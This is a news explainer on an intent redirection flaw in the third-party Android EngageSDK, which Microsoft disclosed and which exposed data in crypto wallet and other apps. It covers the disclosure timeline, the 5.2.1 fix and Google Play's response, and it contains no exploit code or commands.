Android SDK flaw exposed users
Microsoft warned that a vulnerability in an outdated Android software‑development kit left tens of millions of users at risk, including exposure of credentials and financial data. Reports estimate the flaw affected more than 50 million Android users and roughly 30 million wallet installs, highlighting how deprecated mobile components remain a major attack surface. For any firm with a mobile app, the episode underscores the need to track third‑party SDK health as part of security programmes. (techradar.com) (coinpedia.org)
An Android app is really a bundle of other people’s code, and one of those borrowed bundles turned into a back door. On April 9, 2026, Microsoft said a third-party Android software development kit called EngageSDK exposed sensitive data across apps that had installed it. (microsoft.com) A software development kit is a prebuilt tool developers drop into an app instead of writing every feature from scratch. EngageSDK was used for messaging and push notifications, so it ran inside the host app with the same permissions the app already had. (microsoft.com) (securityweek.com) Android keeps apps in separate locked rooms called a security sandbox. Microsoft said this flaw let a malicious app on the same phone trick a vulnerable app into carrying data out of its own locked room. (microsoft.com) (techrepublic.com) The trick used Android “intents,” which are the message slips apps pass around to open screens or hand off tasks. Microsoft found an intent redirection bug, which means the software development kit accepted a fake message from another app and treated it like an internal command. (securityweek.com) (techrepublic.com) Once that happened, the attacker did not need to break Android itself. The malicious app could piggyback on the trusted app’s permissions and reach personal information, login credentials, and financial data stored by the vulnerable app. (microsoft.com) (securityweek.com) The biggest concentration was in crypto wallet apps, where the stakes are unusually high because the app often handles account access and transaction history. Microsoft said wallet apps alone accounted for more than 30 million installs exposed to risk. (microsoft.com) The wider blast radius was even larger. Reports citing Microsoft’s findings said apps carrying the vulnerable kit had reached more than 50 million Android users in total. (techradar.com) (techrepublic.com) Microsoft said it reported the issue to EngageLab in April 2025 and worked with the Android Security Team after that. The vendor fixed the flaw in EngageSDK version 5.2.1 on November 3, 2025. (microsoft.com) (securityweek.com) Google’s side of the response was to remove detected apps using vulnerable versions from Google Play and add automatic protections for users who had already installed them. Microsoft said it had not seen evidence of the flaw being exploited in the wild as of publication. (microsoft.com) (securityweek.com) The ugly part of this story is that the weak point was not the wallet app’s main code but a helper tool buried inside it. One outdated software development kit turned routine features like notifications into a bridge between a malicious app and data that users assumed stayed private. (microsoft.com) (techrepublic.com)
